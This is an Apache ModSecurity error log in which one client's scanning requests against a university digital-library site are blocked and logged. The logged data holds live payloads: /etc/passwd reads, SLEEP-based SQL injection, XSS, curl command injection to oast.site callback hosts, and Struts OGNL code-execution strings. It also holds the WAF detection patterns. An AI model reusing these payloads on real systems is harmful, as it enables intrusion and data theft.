[Tue Aug 29 11:33:35.402808 2023] [:error] [pid 1152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:old. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:old: test|cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/password_change.cgi"] [unique_id "ZO11H8Co-f0AAASAHaYAAAAH"]
[Tue Aug 29 11:33:36.328734 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ppp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ppp: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/jexinv4/jexinv4.jsp"] [unique_id "ZO11IMCo-f0AAARjjN8AAAAL"]
[Tue Aug 29 11:33:36.355952 2023] [:error] [pid 1150] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/cgi-bin/status"] [unique_id "ZO11IMCo-f0AAAR@KGEAAAAF"]
[Tue Aug 29 11:33:37.307443 2023] [:error] [pid 905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: SLEEP( found within ARGS:id: 1 AND (SELECT 1 FROM (SELECT(SLEEP(6)))A)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/wp-content/plugins/chopslider/get_script/index.php"] [unique_id "ZO11IcCo-f0AAAOJKfIAAAAE"]
[Tue Aug 29 11:33:37.326818 2023] [:error] [pid 1099] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:ppp. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:ppp: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/jbossass/jbossass.jsp"] [unique_id "ZO11IcCo-f0AAARLXzcAAAAQ"]
[Tue Aug 29 11:33:37.327297 2023] [:error] [pid 905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/cgi-bin/stats"] [unique_id "ZO11IcCo-f0AAAOJKfMAAAAE"]
[Tue Aug 29 11:33:38.521455 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/cgi-bin/test"] [unique_id "ZO11IsCo-f0AAARy-wwAAAAb"]
[Tue Aug 29 11:33:39.339216 2023] [:error] [pid 905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:USERDBDomains.Domainname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'MwLj'='MwLj found within ARGS:USERDBDomains.Domainname: geardomain' AND '5434'='5435' AND 'MwLj'='MwLj"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/scgi-bin/platform.cgi"] [unique_id "ZO11I8Co-f0AAAOJKf4AAAAE"]
[Tue Aug 29 11:33:39.347026 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/cgi-bin/status/status.cgi"] [unique_id "ZO11I8Co-f0AAANsAjAAAAAD"]
[Tue Aug 29 11:33:40.378984 2023] [:error] [pid 1128] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:id: YHLbGR%{128*128}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "digilib.unla.ac.id"] [uri "/"] [unique_id "ZO11JMCo-f0AAARo82EAAAAT"]
[Tue Aug 29 11:33:40.443421 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:USERDBDomains.Domainname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '5434'='5434 found within ARGS:USERDBDomains.Domainname: geardomain' AND '5434'='5434' AND 'MwLj'='MwLj"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/scgi-bin/platform.cgi"] [unique_id "ZO11JMCo-f0AAARQ4AkAAAAB"]
[Tue Aug 29 11:33:40.443677 2023] [:error] [pid 1133] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/test.cgi"] [unique_id "ZO11JMCo-f0AAARtAAcAAAAV"]
[Tue Aug 29 11:33:40.444537 2023] [:error] [pid 1128] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: %\\xe9\\x8c\\xa6'  found within ARGS:query: aa%\\xe9\\x8c\\xa6' union select 1,md5(999999999),3#'"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "digilib.unla.ac.id"] [uri "/plus/ajax_common.php"] [unique_id "ZO11JMCo-f0AAARo82MAAAAT"]
[Tue Aug 29 11:33:42.295828 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/debug.cgi"] [unique_id "ZO11JsCo-f0AAARQ4BQAAAAB"]
[Tue Aug 29 11:33:43.304850 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "digilib.unla.ac.id"] [uri "/cgi-bin/test-cgi"] [unique_id "ZO11J8Co-f0AAAQKOokAAAAs"]
[Tue Aug 29 11:33:45.378496 2023] [:error] [pid 1156] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:topicId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:topicId: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/widgets/knowledgebase"] [unique_id "ZO11KcCo-f0AAASEJO0AAAAE"]
[Tue Aug 29 11:33:46.303984 2023] [:error] [pid 1157] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:calendarId. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  (5440=5440 found within ARGS:calendarId: 1) AND (SELECT 2065 FROM (SELECT(SLEEP(6)))jtGw) AND (5440=5440"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO11KsCo-f0AAASFec4AAAAG"]
[Tue Aug 29 11:33:47.357655 2023] [:error] [pid 1117] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ssid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:ssid: \\x22'; curl http:/cjmn8l5jmimk2adbbnlgof8zx6magryrf.oast.site -H 'User-Agent: CRvF1U' #"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/"] [unique_id "ZO11K8Co-f0AAARdiMAAAAAK"]
[Tue Aug 29 11:33:48.308112 2023] [:error] [pid 1137] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphon [hostname "digilib.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11LMCo-f0AAARxOrsAAAAa"]
[Tue Aug 29 11:33:48.375753 2023] [:error] [pid 1155] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:ssid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:ssid: \\x22'; curl http:/cjmn8l5jmimk2adbbnlgh6kwzuqczca5g.oast.site -H 'User-Agent: CRvF1U'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/"] [unique_id "ZO11LMCo-f0AAASDb6YAAAAA"]
[Tue Aug 29 11:33:49.307533 2023] [:error] [pid 1137] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:uid. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:uid: 10; curl http:/cjmn8l5jmimk2adbbnlgbsxeqdqpkk91m.oast.site -H 'User-Agent: jT3jXs'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/system/sharedir.php"] [unique_id "ZO11LcCo-f0AAARxOr8AAAAa"]
[Tue Aug 29 11:33:49.339769 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:redirect:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphon [hostname "digilib.unla.ac.id"] [uri "/login.action"] [unique_id "ZO11LcCo-f0AAARy-0cAAAAb"]
[Tue Aug 29 11:33:50.346092 2023] [:error] [pid 1133] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:redirect:${#context["xwork.MethodAccessor.denyMethodExecution"]=false,#f=#_memberAccess.getClass().getDeclaredField("allowStaticMethodAccess"),#f.setAccessible(true),#f.set(#_memberAccess,true),#a=@java.lang.Runtime@getRuntime().exec("sh -c id").getInputStream(),#b=new java.io.InputStreamReader(#a),#c=new java.io.BufferedReader(#b),#d=new char[5000],#c.read(#d),#genxor=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter(),#genxor.println(#d),#genxor.flush(),#genxor.close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#context[\\x22xwork.MethodAccessor.denyMethodExecution\\x22]=false,#f=#_memberAccess.getClass().getDeclaredField(\\x22allowStaticMethodAccess\\x22),#f.setAccess [hostname "digilib.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11LsCo-f0AAARtACMAAAAV"]
[Tue Aug 29 11:33:50.379438 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:task_number. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: curl found within ARGS:task_number: 1;curl http:/cjmn8l5jmimk2adbbnlgfemhzciz76h5s.oast.site -H 'User-Agent: jT3jXs'"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "digilib.unla.ac.id"] [uri "/en/php/usb_sync.php"] [unique_id "ZO11LsCo-f0AAANsAmQAAAAD"]
[Tue Aug 29 11:33:51.352023 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(/\\\\*!?|\\\\*/|[';]--|--[\\\\s\\\\r\\\\n\\\\v\\\\f]|(?:--[^-]*?-)|([^\\\\-&])#.*?[\\\\s\\\\r\\\\n\\\\v\\\\f]|;?\\\\x00)" at ARGS_NAMES:action:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#matt.getWriter().println(#e),#matt.getWriter().flush(),#matt.getWriter().close()}. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "49"] [id "981231"] [rev "2"] [msg "SQL Comment Sequence Detected."] [data "Matched Data: {#a=(new  found within ARGS_NAMES:action:${#a=(new java.lang.ProcessBuilder(new java.lang.String[]{'sh','-c','id'})).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#matt=#context.get('com.opensymphony.xw [hostname "digilib.unla.ac.id"] [uri "/index.action"] [unique_id "ZO11L8Co-f0AAARy-08AAAAb"]
